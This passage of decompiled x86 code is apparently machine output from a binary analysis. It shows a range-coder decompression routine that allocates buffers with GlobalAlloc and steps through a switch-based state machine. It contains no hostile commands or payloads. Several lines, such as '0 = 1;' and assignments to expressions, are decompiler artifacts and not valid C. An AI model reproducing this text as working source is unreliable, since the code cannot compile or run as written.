							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
